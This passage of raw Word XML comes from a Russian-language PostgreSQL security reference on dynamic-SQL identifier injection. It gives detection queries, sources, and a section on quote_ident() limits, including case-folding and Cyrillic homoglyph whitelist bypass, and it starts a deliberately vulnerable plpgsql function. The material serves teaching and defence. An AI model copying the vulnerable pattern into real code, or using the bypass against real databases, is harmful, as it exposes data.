        </w:rPr>
        <w:t>pg_query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28773715" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: внутри EXECUTE plpgsql-функции — необычные statements (DROP, INSERT в non-typical tables, UNION в простых SELECT). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> поле может показать вычисленную форму dynamic SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0088DCF3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_proc` audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — после deployment запрос всех функций с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc LIKE '%format%' AND prosrc NOT LIKE '%\\%I%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — потенциальные уязвимые места.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D911239" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от user-driven endpoint с длинным/подозрительным relation name — индикатор failed identifier injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6174D42C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступна с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PostgreSQL 9.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (сентябрь 2011). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — с очень ранних версий (6.x). Конструкция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появилась вместе с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t>. Никакие фиксы не закрывают этот класс — это design-feature plpgsql executor + разработчик-ошибка R18.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FC7B8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461CD765" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.2 quote_ident ограничения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — функциональный эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%I</w:t>
      </w:r>
      <w:r>
        <w:t>, со своими ограничениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B800B3E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.3 EXECUTE ... USING</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bind-параметризация для значений (не identifier).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C2349" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.4 Конкатенация через ||</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — более прямой антипаттерн (без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вообще).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50229896" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.16.5 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — эскалация: identifier injection в SD-функции даёт RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A449000" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — payload — это classic stacked-injection. Граница: 3.5 — protocol-level; 3.16.1 — внутри plpgsql EXECUTE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13554438" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — application-side analog (та же фундаментальная проблема bind-protocol).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4926C141" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.7.1 / 3.7.2 / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — финальные RCE-векторы, доступные через 3.16.5 эскалацию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED0BB31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>R18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — research-anchor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA4C2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18391A1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «String Functions and Operators» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-string.html#FUNCTIONS-STRING-FORMAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AB941D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «PL/pgSQL — Executing Dynamic Commands» — https://www.postgresql.org/docs/current/plpgsql-statements.html#PLPGSQL-STATEMENTS-EXECUTING-DYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5E049D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   PostgreSQL Docs: «System Information Functions» / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — https://www.postgresql.org/docs/current/functions-info.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E3B9FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   SQL-injection-safe pattern (xflr6 gist, цитируется в R18) — https://gist.github.com/xflr6/33db779acd7fe79faadeb0f28fc053bd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662757B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   2ndQuadrant blog: «PL/pgSQL dynamic queries» — https://www.2ndquadrant.com/en/blog/dynamic-sql-pl-pgsql/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A419201" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   depesz blog: «Why you should use format() instead of concatenation» — https://www.depesz.com/2013/04/05/waiting-for-9-3-add-format-function-with-i-l-s-conversions/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AEB2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   R18 (sources/research.md, строки 274–291)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6D341B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.16.2 quote_ident() и его ограничения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4474B4F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — отдельная функция PostgreSQL, эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%I', text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Возвращает строку, безопасную для использования как identifier: добавляет double-quotes если нужно, удваивает внутренние </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>основной защитный инструмент</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для identifier-injection в plpgsql, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>но он имеет три критичных ограничения</w:t>
      </w:r>
      <w:r>
        <w:t>, которые часто становятся причиной mis-use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F5AAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`quote_ident` НЕ для значений</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Для строкового literal нужен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_literal(text)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format('%L', ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или (предпочтительно) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE USING $1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B564464" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`quote_ident` НЕ нормализует case</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('Users')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Users"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (точное имя с capital U), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('users')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без quotes, lowercase). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разные имена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для PostgreSQL — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT FROM "Users"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ищет таблицу с capital U; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT FROM users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без quotes) ищет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (folded к lowercase).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A63E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`quote_ident` НЕ помогает обойти whitelist через Unicode homoglyphs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident('uѕers')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (с Cyrillic 's' U+0455) → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>uѕers</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (без quotes, потому что Cyrillic 's' валиден как identifier-char) — теперь это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>разные таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с latin 's'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73268760" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Сочетание этих ограничений с whitelist-проверками создаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>false sense of security</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: разработчик правильно вызывает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но whitelist проверяется до этого без учёта case/Unicode, и атакующий обходит whitelist, передавая в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> значение, которое </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>проходит whitelist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (равенство bytes), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>указывает на другую таблицу</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (case-fold / Unicode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28246982" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F06EFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Функция с whitelist-проверкой ДО quote_ident</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDE42FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.read_table(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BCB967"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2D218800" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B2AD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    allowed text[] := ARRAY['public_users', 'public_articles', 'public_comments'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C572E7A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379EFD53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    -- Whitelist-проверка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69692E7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
